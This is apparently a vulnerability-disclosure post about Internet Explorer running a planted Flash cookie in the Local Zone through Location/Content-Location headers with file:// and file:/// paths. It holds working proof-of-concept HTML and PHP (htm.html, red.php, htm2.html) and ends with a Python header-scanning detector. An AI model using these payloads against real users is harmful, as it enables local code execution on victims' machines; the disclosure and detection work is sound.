Internet Explorer Vulnerability: Content-Location works with both triple and double slash
After I reported the Content-Location vulnerability (http://www.securityfocus.com/archive/1/342317), Thor Larholm explained that the HTML execution was not caused by the Content-Location header, but instead by the triple slash (file:///).
I have tested it with double slash and I even tested the triple slash without the Content-Location header, but neither worked.
The difference between triple slash and double slash is that with triple slash htm.html loads the cookie in the iframe, while with double slash the whole page tries to load the cookie, which then requires the user to press Back and then refresh the page.
I have created 2 proof-of-concepts which show how both vulnerabilities cannot be exploited separately.
1. http://mlsecurity.com/ie/wee.php
This page will create a flash cookie and when you press continue it will load htm.html which contains an iframe.
This iframe will load red.php which contains the Content-Location header pointing at the flash cookie.
The flash cookie location will only have a double slash (file://).
wee.php - Loads a flash movie which creates a cookie in C:/Documents and Settings/administrator/Application Data/Macromedia/Flash Player/mlsecurity.com/mlsecurity.sol
htm.html
******************************
<html>
<!-- querystring.js (not included in this post) fills QueryString[] from the page's URL -->
<script type="text/javascript" src="querystring.js"></script>
<script>
// Write an iframe that loads red.php with the user name (a) and drive taken from the query string
document.write(unescape("%3Ciframe%20name%3D%22wee2%22%20src%3D%22red.php%3Fa%3D"
+ QueryString['a'] + "%26drive%3D" + QueryString['drive'] +
"%22%3E%3C/iframe%3E"));
</script>
<br><p>
Sometimes the iframe doesn't load properly. If the iframe shows a white blank
page then press refresh.
<p>
You will know when the exploit worked when the iframe shows weird stuff like
my_Array0Sven1kelor2.
<p>
The script assumes you are under windows 2000/XP logged on as administrator.<br>
If you are not logged on as administrator type the username you're logged in
under in the box below and press Go Go Go.<p>
<form method="GET">
Logged on to windows as user: <input type=text name="a"
value="administrator"><br>
Windows is installed on drive: <input type=text name="drive" value="C"><br>
<input type=submit value="Go Go Go">
</form>
<p>
This should create a file called mlsecurity.txt in your c:\ drive.
<p>
<a href="exp.php">How it works?</a>
</html>
******************************
red.php
******************************
<?php
// User name from the query string; fall back to "administrator" when missing
// or when the form passed the literal JavaScript value "undefined".
$a = isset($_GET["a"]) ? $_GET["a"] : "";
if(!$a || $a=="undefined")
{
$a="administrator";
}
// Drive letter from the query string, with the same "undefined" fallback to "C".
if(isset($_GET["drive"]) && $_GET["drive"] && !strstr($_GET["drive"],"unde"))
{
$d=$_GET["drive"];
}else
{
$d="C";
}
// Send the iframe to the Flash cookie (.sol) on the local disk (double slash form).
header("Location: file://".$d.":/Documents and Settings/".$a."/Application Data/Macromedia/Flash Player/mlsecurity.com/mlsecurity.sol");
?>
******************************
2. http://mlsecurity.com/ie/ie.php
This proof-of-concept only uses the triple slash method to open the cookie in an iframe.
ie.php - Loads a flash movie which creates a cookie in C:/Documents and Settings/administrator/Application Data/Macromedia/Flash Player/mlsecurity.com/mlsecurity.sol
htm2.html
******************************
<html>
<iframe src="file:///C:/Documents and Settings/administrator/Application Data/Macromedia/Flash Player/mlsecurity.com/mlsecurity.sol"></iframe>
<p>
Note: you might need to edit the html to fit your system.
<p>
Macromedia Flash Player is reported to store Flash cookies (.sol files) in a
predictable location on client systems.
Other attacks are possible given the ability to store content on a system in a
predictable location, such as
referencing the content via a file:// URI. This is compounded by the fact that
an attacker could include HTML
and script code in the cookie, which may be interpreted by Internet Explorer or
possibly other browsers.
In the example of Internet Explorer, such content would be interpreted in the
context of the Local Zone.
Successful exploitation would still require the attacker to guess the local
username of the victim.
<br>
<br>This issue is reported to affect versions of the player for Microsoft
Windows operating systems.
Other versions may also be affected. Macromedia Director MX is similarly
affected.
<br>
<br>This issue was originally covered by Securityfocus.com BID 8886 but has
been determined to be a distinct
issue in Macromedia Flash. Securityfocus.com BID 8886 was also updated with
additional technical details
describing a new issue in Internet Explorer. The original report for these
issues was a proof-of-concept
provided by Mindwarper which exploited both of the issues simultaneously.
<p>
- Discovered by Mindwarper<br>
</html>
******************************
I have tested these pages on both Win2k SP4 with IE6 fully patched and on WinXP.
I even tried using a few IE hacks and it still worked.
-----------------------------|
- Mindwarper |
- mindwarper@xxxxxxxxxxxxx |
- http://mlsecurity.com |
-----------------------------|
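The post contrasts a double-slash (file://C:/...) and a triple-slash (file:///C:/...) target in a Location or Content-Location header. The following is an added example, not code from the post or from mlsecurity.com: it shows how a URL parser splits the two forms (the drive letter lands in the authority slot with two slashes, in the path with three), and it scans a set of constructed response headers for redirect or Content-Location targets that use the file: scheme, the kind of check a filtering proxy or response-scanning rule could apply. The header values are constructed sample data modelled on the paths in the post.

```python
"""Added example: parse double- vs triple-slash file: URIs and flag
Location / Content-Location headers that point at a local file: target."""
from urllib.parse import urlsplit

# Constructed sample response headers modelled on the post's PoC paths;
# not captured from the real pages.
SOL_PATH = ("Documents and Settings/administrator/Application Data/"
            "Macromedia/Flash Player/mlsecurity.com/mlsecurity.sol")
SAMPLE_HEADERS = [
    ("Content-Type", "text/html"),
    ("Location", "http://example.invalid/next"),        # ordinary redirect
    ("Location", "file://C:/" + SOL_PATH),              # double slash (PoC 1)
    ("Content-Location", "file:///C:/" + SOL_PATH),     # triple slash (PoC 2)
    ("Content-Location", "/static/page.html"),          # relative, not local
]


def split_file_uri(uri):
    """Return (scheme, authority, path) as urlsplit sees them.

    'file://C:/...' puts the drive letter in the authority slot;
    'file:///C:/...' leaves the authority empty and starts the path with
    the drive letter. That is the syntactic difference between the two
    proof-of-concepts in the post.
    """
    parts = urlsplit(uri)
    return parts.scheme.lower(), parts.netloc, parts.path


def flag_local_targets(headers):
    """Return (header name, slash shape) for every Location or
    Content-Location header whose target uses the file: scheme."""
    findings = []
    for name, value in headers:
        if name.lower() not in ("location", "content-location"):
            continue
        scheme, authority, _path = split_file_uri(value.strip())
        if scheme != "file":
            continue
        if authority:
            shape = "double slash, authority=%r" % authority
        else:
            shape = "triple slash, empty authority"
        findings.append((name, shape))
    return findings


if __name__ == "__main__":
    for name, shape in flag_local_targets(SAMPLE_HEADERS):
        print("%s header points at a local file (%s)" % (name, shape))
```

Both forms are caught by checking the scheme alone; the authority/path split only tells you which shape was used. A rule that looked for "file:///" only would miss the double-slash variant the first proof-of-concept relies on.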